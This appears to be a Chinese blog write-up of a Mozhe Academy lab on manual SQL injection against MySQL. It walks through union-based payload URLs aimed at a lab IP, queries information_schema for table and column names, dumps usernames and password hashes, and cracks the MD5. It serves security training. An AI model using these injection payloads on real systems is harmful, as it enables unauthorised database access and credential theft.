【墨者学院SQL手工注入漏洞测试(MySQL数据库)】

靶场地址 在线靶场_墨者学院 (mozhe.cn)

启动靶场  观察是否存在入住点  点击进入登陆下面可能存在注入的页面地址

进入后获得以下页面 发现 ?id=1 

运用sql语句 在?id=1后面添加and 1=1 页面正常 and 1=2 页面返回错误 可能存在注入点

运用 order by x 猜列名字段数量 看里面有多少个  

从order by 1 猜测到 order by 5时页面错误 输入order by 4时页面正常 从此可以判定该表列数为4 

获得到表的列数后 运用 union 语句进行猜解 让页面报错 显示出数字 

可以在id=1 后面添加 and 1=2 或者id=1添加一个负号

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,2,3,4

http://124.70.22.208:48188/new_list.php?id=1 and 1=2 union select 1,2,3,4

经以上操作报出数字2 3 这时候就可以在 2和3的位置进行相关的数据查询

查询数据库名字 数据库版本 将database()和version()带入 2,3中

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,database(),version(),4 

获得数据库名字为:mozhe_Discuz_StormGroup

数据库版本:5.7.22-0ubuntu0.16.04.1

数据库版本为5.7.22-0ubuntu0.16.04.1 在该版本的数据库中mysql存在一个自带的数据库名为information_schema里面含有数据库名 表名 列名 可以用 information_schema进行有据查询

从而可以通过查询它获得名为 mozhe_Discuz_StormGroup数据库中的表名 列名信息

mysql5.0以下:不存在information_schema数据库

mysql5.0以上:存在information_schema数据库

查询mozhe_Discuz_StormGroup下的所有表名信息 获得StormGroup_member 和 通知

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup' 

查到表名为:StormGroup_member 

进行查询StormGroup_member 表名下面的列名信息

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询StormGroup_member中的 用户名 密码

http://124.70.22.208:48188/new_list.php?id=-1 union select 1,name,password,4 from StormGroup_member

用户名:mozhe

如果有多个密码就在后面加上 limit 0,1 显示第一个 limit 1,1 显示第二个

找到一个可以白票的网站进行md5解密 获得密码 最后输入密码登陆即可

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值